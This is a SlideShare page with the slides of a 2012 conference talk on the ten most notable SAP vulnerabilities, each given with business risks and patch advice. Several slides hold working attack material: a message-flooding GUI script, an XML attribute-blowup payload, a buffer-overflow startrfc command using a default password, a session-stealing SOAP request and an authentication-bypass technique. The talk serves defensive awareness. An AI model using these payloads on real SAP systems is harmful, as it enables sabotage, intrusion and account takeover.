SlideShare ist ein Scribd-Unternehmen logo

SAP (In)Security: New and Best

Als PPTX, PDF herunterladen
Positive Hack Days
Positive Hack Days

The document discusses various security issues related to SAP systems. It begins with an introduction to SAP and overview of SAP security history. It then covers the top 10 latest interesting attacks against SAP systems, including authentication bypass vulnerabilities, buffer overflows, and denial of service attacks. The document provides details on each vulnerability, including technical details, potential business impacts, and recommendations for prevention. It aims to educate audiences on the most critical vulnerabilities impacting SAP systems.

Technologie
1 von 67
Invest in security to secure investments SAP (In)Security: New and Best Alexander Polyakov CTO at ERPScan/Digital Security May 31, 2012
Me Business application security expert
Instead of Intro Vulnerabilities are everywhere
What is SAP ? Shut up And Pay
Really • The most popular business application • More than 120000 customers • 74% of Forbes 500
Agenda • Intro • SAP security history • SAP on the Internet • Most popular SAP issues (OLD) • Top 10 latest interesting attacks (NEW) • DEMOs • Conclusion
3 areas of SAP Security 2002 Business logic security Prevents attacks or mistakes made by insiders Solution: GRC 2008 ABAP Code security Prevents attacks or mistakes made by developers Solution: Code audit 2010 Application platform security Prevents unauthorized access both within the corporate network and from remote attackers Solution?
Talks about SAP security 35 30 Most popular: • BlackHat 25 • HITB • Troopers 20 • RSA • Source 15 • DeepSec • etc. 10 5 0 2006 2007 2008 2009 2010 2011 2012
SAP Security notes 900 800 700 600 500 By April 26, 2012, a total of 2026 notes 400 300 200 100 0 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012
SAP vulnerabilities by type 1 - Directory Traversal 2 - XSS/Unauthorised modification of stored content 3 - Missing Auth check 4 - Information Disclosure 5 - Unauthorized usage of application functionality 6 - Hard-coded credentials 7 - Code injection vulnerability 8 - Verb tampering Stats from : 9 - Remote Code Execution • 1Q 2012 • 1Q 2010 10 - Denial of service • 4Q 2009 11 - BOF 12 -SQL Inj 0 50 100 150 200 250 300 350
Top problems by OWASP-EAS (Implementation issues) EASAI-1 Lack of patch management EASAI-2 Default Passwords for application access EASAI-3 SOD conflicts EASAI-4 Unnecessary Enabled Application features EASAI-5 Open Remote management interfaces EASAI-6 lack of password lockout/complexity checks EASAI-7 Insecure options EASAI-8 Unencrypted communications EASAI-9 Insecure trust relations EASAI-10 Guest access
Top problems by BIZEC ● BIZEC TEC-01: Vulnerable Software in Use ● BIZEC TEC-02: Standard Users with Default Passwords ● BIZEC TEC-03: Unsecured SAP Gateway ● BIZEC TEC-04: Unsecured SAP/Oracle authentication ● BIZEC TEC-05: Insecure RFC interfaces ● BIZEC TEC-06: Insufficient Security Audit Logging ● BIZEC TEC-07: Unsecured SAP Message Server ● BIZEC TEC-08: Dangerous SAP Web Applications ● BIZEC TEC-09: Unprotected Access to Administration Services ● BIZEC TEC-10: Insecure Network Environment ● BIZEC TEC-11: Unencrypted Communications
Business Risks Espionage • Stealing financial information • Stealing corporate secrets • Stealing suppliers and customers list • Stealing HR data Sabotage • Denial of service • Modification of financial reports • Access to technology network (SCADA) by trust relations Fraud • False transactions • Modification of master data • e.t.c.
SAP on the Internet MYTH: SAP systems attacks available only for insiders • We have collected data about SAP systems in the WEB • Have various stats by countries, applications, versions • Information from Google, Shodan, Nmap scan
SAP on the Internet
SAP on the Internet About 5000 systems including Dispatcher, Message server, SapHostcontrol, Web- services
Top 10 vulnerabilities 2011-2012 1. Authentication Bypass via Verb tampering 2. Authentication Bypass via the Invoker servlet 3. Buffer overflow in ABAP Kernel 4. Code execution via TH_GREP N 5. MMC read SESSIONID N 6. Remote portscan Nw 7. Encryption in SAPGUI N N w 8. BAPI XSS/SMBRELAY N N N Nw 9. XML Blowup DOS w N 10. GUI Scripting DOS w
10 – GUI-Scripting DOS: Description New • SAP users can run scripts which automate their user functions • A script has the same rights in SAP as the user who launched it • Security message which is shown to user can be turned off in the registry • Almost any user can use SAP Messages (SM02 transaction) • It is possible to run DOS attack on any user using a simple script Author: Dmitry Chastukhin (ERPScan)
10 – GUI-scripting: Details If Not IsObject(application) Then Set SapGuiAuto = GetObject("SAPGUI") Set application = SapGuiAuto.GetScriptingEngine End If If Not IsObject(connection) Then Set connection = application.Children(0) End If If Not IsObject(session) Then Set session = connection.Children(0) End If If IsObject(WScript) Then WScript.ConnectObject session, "on" WScript.ConnectObject application, "on" End If do a=a+1 session.findById("wnd[0]").maximize session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02" session.findById("wnd[0]/tbar[0]/btn[0]").press session.findById("wnd[0]/tbar[1]/btn[34]").press session.findById("wnd[1]/usr/txtEMLINE1").text = "hello" session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0 session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0 session.findById("wnd[1]").sendVKey 4 session.findById("wnd[2]/usr/lbl[1,3]").setFocus session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15 session.findById("wnd[2]").sendVKey 2 session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800" session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en" session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2 session.findById("wnd[1]/tbar[0]/btn[0]").press Loop Until a>=1000
10 – GUI-scripting: Other attacks Script can be uploaded using: – SAPGUI ActiveX vulnerability – Teensy USB flash – Any other method of client exploitation Other attacks like changing banking accounts in LFBK also possible
10 – GUI-scripting: Business risks Sabotage – High Espionage – No Fraud – No Ease of exploitation – Medium
10 – GUI-scripting: Prevention • SAP GUI Scripting Security Guide • sapgui/user_scripting = FALSE • Block registry modification on workstations
9 – XML Blowup DOS: Description New • WEBRFC interface can be used to run RFC functions • By default any user can have access • Can execute at least RFC_PING • SAP NetWeaver is vulnerable to malformed XML packets • It is possible to run DOS attack on server using simple script • It is possible to run over the Internet! Author: Alexey Tyurin (ERPScan)
9 – XML Blowup DOS: Details <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Body><m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions" a1="" a2="" ... a10000="" > </m:RFC_PING> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
9 – XML Blowup DOS: Business risks Sabotage – Critical Espionage – No Fraud – No Ease of exploitation – Medium
9 – XML Blowup DOS: Prevention • Disable WEBRFC • Prevent unauthorized access to WEBRFC using S_ICF • Install SAP notes 1543318 and 1469549
8 – BAPI script injection/hash stealing : Description • SAP BAPI transaction fails to properly sanitize input • Possible to inject JavaScript code or link to a fake SMB server • SAP GUI clients use Windows so their credentials will be transferred to attackers host. Author: Dmitry Chastukhin (ERPScan)
8 – BAPI script injection/hash stealing: Demo New
8 – BAPI script injection/hash stealing: Business risks Espionage – High Sabotage – High Fraud – High Ease of exploitation – Low
7 – SAP GUI bad encryption: Description New • SAP FrontEnd can save encrypted passwords in shortcuts • Shortcuts stored in .sap file • This password uses byte-XOR algorithm with “secret” key • Key has the same value for every installation of SAP GUI • Any password can be decrypted in 1 second Author: Alexey Sintsov (ERPScan)
7 – SAP GUI bad encryption: Demo
7 – SAP GUI bad encryption: Business risks Espionage – High Sabotage – Medium Fraud – High Ease of exploitation – Medium
7 – SAP GUI bad encryption: Prevention • Disable password storage in GUI
6 – Remote port scan via JSP: Description • It is possible to scan internal network from the Internet • Authentication is not required • SAP NetWeaver J2EE engine is vulnerable /ipcpricing/ui/BufferOverview.jsp? server=172.16.0.13 & port=31337 & password= & dispatcher= & targetClient= & view= Author: Alexander Polyakov (ERPScan)
6 – Remote port scan via JSP: Demo Host is not alive HTTP port Port closed SAP port
6 – Remote port scan via JSP: Business risks Sabotage – Low Espionage – Medium Fraud – No Ease of exploitation – High
6 – Remote port scan via JSP: Prevention • Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883 • Disable unnecessary applications
5 – MMC JSESSIONID stealing: Description New • Remote management of SAP Platform • By default, many commands go without auth • Exploits implemented in Metasploit (by ChrisJohnRiley) • Most of the bugs are information disclosure • It is possible to find information about JSESSIONID • Only if trace is ON 1) Original bug by ChrisJohnRiley 2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan) Can be authenticated as an existing user remotely
5 – MMC SESSIONID stealing: Details <?xml version="1.0" encoding="UTF-8" ?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess = "http://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:ReadLogFile xmlns:ns1="urn:SAPControl"> <filename>j2ee/cluster/server0/log/system/userinterface.log</filename> <filter></filter> <language></language> <maxentries>100</maxentries> <statecookie>EOF</statecookie> </ns1:ReadLogFile> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
5 – MMC JSESSIONID stealing: Business risks Espionage – Critical Fraud – High Sabotage – Medium Ease of exploitation – Medium
5 – MMC JSESSIONID stealing: Prevention • The JSESSIONID by default will not be logged in log file • Don’t use TRACE_LEVEL = 3 on production systems or delete traces after use • Other info http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000 a114084/frameset.htm
4 – Remote command execution in TH_GREP: Description • RCE vulnerability in RFC module TH_GREP • Found by Joris van de Vis • SAP was not properly patched (1433101) • We have discovered that the patch can be bypassed in Windows Original bug by Joris van de Vis (erp-sec) Bypass by Alexey Tyurin (ERPScan)
4 – RCE in TH_GREP: Details elseif opsys = 'Windows NT'. concatenate '/c:"' string '"' filename into grep_params in character mode. else. /*if linux*/ /* 185 */ replace all occurrences of '''' in local_string with '''"''"'''. /* 186 */ concatenate '''' local_string '''' filename into grep_params /* 187*/ in character mode. /* 188*/ endif. /* 188*/
4 – RCE in TH_GREP: Demo #1
4 - RCE in TH_GREP: More details 4 ways to execute vulnerable program • Using transaction "Se37“ • Using transaction “SM51“ (thanks to Felix Granados) • Using remote RFC call "TH_GREP" • Using SOAP RFC call "TH_GREP" via web
4 – RCE in TH_GREP: Demo #2
4 – RCE in TH_GREP: Business risks Espionage – High Sabotage – Medium Fraud – High Ease of exploitation – medium
4 – RFC in TH_GREP: Prevention • Install SAP notes 1580017, 1433101 • Prevent access to critical transactions and RFC functions • Check the ABAP code of your Z-transactions for similar vulnerabilities
3 - ABAP Kernel BOF: Description • Presented by Andreas Wiegenstein at BlackHat EU 2011 • Buffer overflow in SAP kernel function C_SAPGPARAM • When NAME field is more than 108 chars • Can be exploited by calling an FM which uses C_SAPGPARAM • Example of report – RSPO_R_SAPGPARAM Author: (VirtualForge)
3 -ABAP Kernel BOF: Details > startrfc.exe -3 -h 172.16.0.63 -s 01 -c 000 –u SAP* -p 11111 -F RSPO_R_SAPGPARAM -E NAME=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA -t 4 RFC Call/Exception: SYSTEM_FAILURE Group Error group 104 Key RFC_ERROR_SYSTEM_FAILURE Message connection closed without message (CM_NO_DATA_RECEIVED)
3 – ABAP Kernel BOF: Business risks Espionage – Critical Sabotage – Critical Fraud – Critical Ease of exploitation – Medium
3 – ABAP Kernel BOF: Prevention • Install SAP notes: - 1493516 – Correcting buffer overflow in ABAP system call - 1487330 – Potential remote code execution in SAP Kernel • Prevent access to critical transactions and RFC functions • Check the ABAP code of your Z-transactions for critical calls
2 – Invoker Servlet: Description • Rapidly calls servlets by their class name • Published by SAP in their security guides • Possible to call any servlet from the application • Even if it is not declared in WEB.XML Can be used for auth bypass
2 - Invoker Servlet: Details <servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet-class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> Author: Dmitry Chastukhin (ERPScan) What if we call /servlet/com.sap.admin.Critical.Action
2 – Invoker servlet: Business risks Espionage – High Sabotage – High Fraud – High Ease of use – Very easy!
2 - Invoker servlet: Prevention • Update to the latest patch 1467771, 1445998 • “EnableInvokerServletGlobally” property of the servlet_jsp must be “false” If you can’t install patches for some reason, you can check all WEB.XML files using ERPScan web.xml scanner manually.
1 – VERB Tampering
1st Place – Verb Tampering <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> Author: Alexander Polyakov (ERPScan) What if we use HEAD instead of GET ?
1st Place – Verb tampering: Details • CTC – Secret interface for managing J2EE engine • Can be accessed remotely • Can run user management actions: – Add users – Add to groups – Run OS commands – Start/Stop J2EE Remotely without authentication!
1 – Verb tampering: Demo
1 – Verb tampering: More details If patched, can be bypassed by the Invoker servlet!
1 – Verb tampering: Business risks Espionage – Critical Sabotage – Critical Fraud – Critical Ease of use – Very easy!
1st Place – Verb tampering: Prevention Prevention: • Install SAP notes 1503579,1616259 • Install other SAP notes about Verb Tampering (about 18) • Scan applications using ERPScan WEB.XML check tool or manually • Secure WEB.XML by deleting all <http-method> • Disable the applications that are not necessary
Conclusion It is possible to be protected from almost all those kinds of issues and we are working hard with SAP to make it secure SAP Guides Regular Security assessments Monitoring technical security ABAP Code review Segregation of Duties It’s all in your hands
Future work Many of the researched things cannot be disclosed now because of our good relationship with SAP Security Response Team, whom I would like to thank for cooperation. However, if you want to see new demos and 0-days, follow us at @erpscan and attend the future presentations: • Just4Meeting in July (Portugal) • BlackHat USA in July (Las Vegas)
Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov.
web: www.dsec.ru www.erpscan.com e-mail: info@erpscan.com sales@erpscan.com Twitter: @erpscan @sh2kerr

Empfohlen

Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPERPScan
 
OWASP TOP 10
OWASP TOP 10OWASP TOP 10
OWASP TOP 10Robert MacLean
 
Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterEqual Experts
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASPMarco Morana
 
Web application penetration testing
Web application penetration testingWeb application penetration testing
Web application penetration testingImaginea
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itCyber Security Alliance
 
APIdays London 2019 - API Security Tips for Developers with Isabelle Mauny, 4...
APIdays London 2019 - API Security Tips for Developers with Isabelle Mauny, 4...APIdays London 2019 - API Security Tips for Developers with Isabelle Mauny, 4...
APIdays London 2019 - API Security Tips for Developers with Isabelle Mauny, 4...apidays
 
WAFEC
WAFECWAFEC
WAFECConferencias FIST
 

Empfohlen

Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPERPScan
 
OWASP TOP 10
OWASP TOP 10OWASP TOP 10
OWASP TOP 10Robert MacLean
 
Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterEqual Experts
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASPMarco Morana
 
Web application penetration testing
Web application penetration testingWeb application penetration testing
Web application penetration testingImaginea
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itCyber Security Alliance
 
APIdays London 2019 - API Security Tips for Developers with Isabelle Mauny, 4...
APIdays London 2019 - API Security Tips for Developers with Isabelle Mauny, 4...APIdays London 2019 - API Security Tips for Developers with Isabelle Mauny, 4...
APIdays London 2019 - API Security Tips for Developers with Isabelle Mauny, 4...apidays
 
WAFEC
WAFECWAFEC
WAFECConferencias FIST
 
Xamarin security talk slideshare
Xamarin security talk slideshareXamarin security talk slideshare
Xamarin security talk slideshareMarcus de Wilde
 
Injecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime WhitepaperInjecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime WhitepaperAjin Abraham
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerThreatReel Podcast
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
Addressing the OWASP Mobile Security Threats using Xamarin
Addressing the OWASP Mobile Security Threats using XamarinAddressing the OWASP Mobile Security Threats using Xamarin
Addressing the OWASP Mobile Security Threats using XamarinAlec Tucker
 
Web Database Server Best Practices
Web Database Server Best PracticesWeb Database Server Best Practices
Web Database Server Best Practicessyrinxtech
 
Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)Prathan Phongthiproek
 
[OPD 2019] Top 10 Security Facts of 2020
[OPD 2019] Top 10 Security Facts of 2020[OPD 2019] Top 10 Security Facts of 2020
[OPD 2019] Top 10 Security Facts of 2020OWASP
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeAjin Abraham
 
nCircle Webinar: Get your Black Belt
nCircle Webinar: Get your Black Belt nCircle Webinar: Get your Black Belt
nCircle Webinar: Get your Black Belt nCircle - a Tripwire Company
 
Owasp mobile top 10
Owasp mobile top 10Owasp mobile top 10
Owasp mobile top 10Pawel Rzepa
 
Web Application Frewall
Web Application FrewallWeb Application Frewall
Web Application FrewallAbhishek Singh
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseThe New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseSecurity Innovation
 
snort certification
snort certificationsnort certification
snort certificationVskills
 
Mobile Threats and Owasp Top 10 Risks
Mobile Threats and Owasp Top 10 RisksMobile Threats and Owasp Top 10 Risks
Mobile Threats and Owasp Top 10 RisksSantosh Satam
 
G01.2012 magic quadrant for endpoint protection
G01.2012 magic quadrant for endpoint protectionG01.2012 magic quadrant for endpoint protection
G01.2012 magic quadrant for endpoint protectionSatya Harish
 
OWASP an Introduction
OWASP an Introduction OWASP an Introduction
OWASP an Introduction alessiomarziali
 
Mobile Application Security – Effective methodology, efficient testing!
Mobile Application Security – Effective methodology, efficient testing!Mobile Application Security – Effective methodology, efficient testing!
Mobile Application Security – Effective methodology, efficient testing!espheresecurity
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionAnant Shrivastava
 
SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and bestERPScan
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figuresERPScan
 

Weitere ähnliche Inhalte

Was ist angesagt?

Xamarin security talk slideshare
Xamarin security talk slideshareXamarin security talk slideshare
Xamarin security talk slideshareMarcus de Wilde
 
Injecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime WhitepaperInjecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime WhitepaperAjin Abraham
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerThreatReel Podcast
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
Addressing the OWASP Mobile Security Threats using Xamarin
Addressing the OWASP Mobile Security Threats using XamarinAddressing the OWASP Mobile Security Threats using Xamarin
Addressing the OWASP Mobile Security Threats using XamarinAlec Tucker
 
Web Database Server Best Practices
Web Database Server Best PracticesWeb Database Server Best Practices
Web Database Server Best Practicessyrinxtech
 
[OPD 2019] Top 10 Security Facts of 2020
[OPD 2019] Top 10 Security Facts of 2020[OPD 2019] Top 10 Security Facts of 2020
[OPD 2019] Top 10 Security Facts of 2020OWASP
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeAjin Abraham
 
Owasp mobile top 10
Owasp mobile top 10Owasp mobile top 10
Owasp mobile top 10Pawel Rzepa
 
Web Application Frewall
Web Application FrewallWeb Application Frewall
Web Application FrewallAbhishek Singh
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples42Crunch
 
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseThe New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseSecurity Innovation
 
snort certification
snort certificationsnort certification
snort certificationVskills
 
Mobile Threats and Owasp Top 10 Risks
Mobile Threats and Owasp Top 10 RisksMobile Threats and Owasp Top 10 Risks
Mobile Threats and Owasp Top 10 RisksSantosh Satam
 
G01.2012 magic quadrant for endpoint protection
G01.2012 magic quadrant for endpoint protectionG01.2012 magic quadrant for endpoint protection
G01.2012 magic quadrant for endpoint protectionSatya Harish
 
Mobile Application Security – Effective methodology, efficient testing!
Mobile Application Security – Effective methodology, efficient testing!Mobile Application Security – Effective methodology, efficient testing!
Mobile Application Security – Effective methodology, efficient testing!espheresecurity
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionAnant Shrivastava
 

Was ist angesagt? (20)

Xamarin security talk slideshare
Xamarin security talk slideshareXamarin security talk slideshare
Xamarin security talk slideshare
 
Injecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime WhitepaperInjecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime Whitepaper
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec Primer
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Addressing the OWASP Mobile Security Threats using Xamarin
Addressing the OWASP Mobile Security Threats using XamarinAddressing the OWASP Mobile Security Threats using Xamarin
Addressing the OWASP Mobile Security Threats using Xamarin
 
Web Database Server Best Practices
Web Database Server Best PracticesWeb Database Server Best Practices
Web Database Server Best Practices
 
Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)
 
[OPD 2019] Top 10 Security Facts of 2020
[OPD 2019] Top 10 Security Facts of 2020[OPD 2019] Top 10 Security Facts of 2020
[OPD 2019] Top 10 Security Facts of 2020
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at Runtime
 
nCircle Webinar: Get your Black Belt
nCircle Webinar: Get your Black Belt nCircle Webinar: Get your Black Belt
nCircle Webinar: Get your Black Belt
 
Owasp mobile top 10
Owasp mobile top 10Owasp mobile top 10
Owasp mobile top 10
 
Web Application Frewall
Web Application FrewallWeb Application Frewall
Web Application Frewall
 
OWASP API Security Top 10 Examples
OWASP API Security Top 10 ExamplesOWASP API Security Top 10 Examples
OWASP API Security Top 10 Examples
 
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseThe New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the Chase
 
snort certification
snort certificationsnort certification
snort certification
 
Mobile Threats and Owasp Top 10 Risks
Mobile Threats and Owasp Top 10 RisksMobile Threats and Owasp Top 10 Risks
Mobile Threats and Owasp Top 10 Risks
 
G01.2012 magic quadrant for endpoint protection
G01.2012 magic quadrant for endpoint protectionG01.2012 magic quadrant for endpoint protection
G01.2012 magic quadrant for endpoint protection
 
OWASP an Introduction
OWASP an Introduction OWASP an Introduction
OWASP an Introduction
 
Mobile Application Security – Effective methodology, efficient testing!
Mobile Application Security – Effective methodology, efficient testing!Mobile Application Security – Effective methodology, efficient testing!
Mobile Application Security – Effective methodology, efficient testing!
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
 

Ähnlich wie SAP (In)Security: New and Best

SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and bestERPScan
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figuresERPScan
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easyERPScan
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsERPScan
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating ERPScan
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsERPScan
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)securityiphonepentest
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngSecurity Bootcamp
 
Assess and monitor SAP security
Assess and monitor SAP securityAssess and monitor SAP security
Assess and monitor SAP securityERPScan
 
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...Cristian Garcia G.
 
Top 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngTop 10 mobile security risks - Khổng Văn Cường
Top 10 mobile security risks - Khổng Văn CườngVõ Thái Lâm
 
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...apidays
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineERPScan
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit ERPScan
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsERPScan
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...ERPScan
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP MobileERPScan
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM HackingERPScan
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
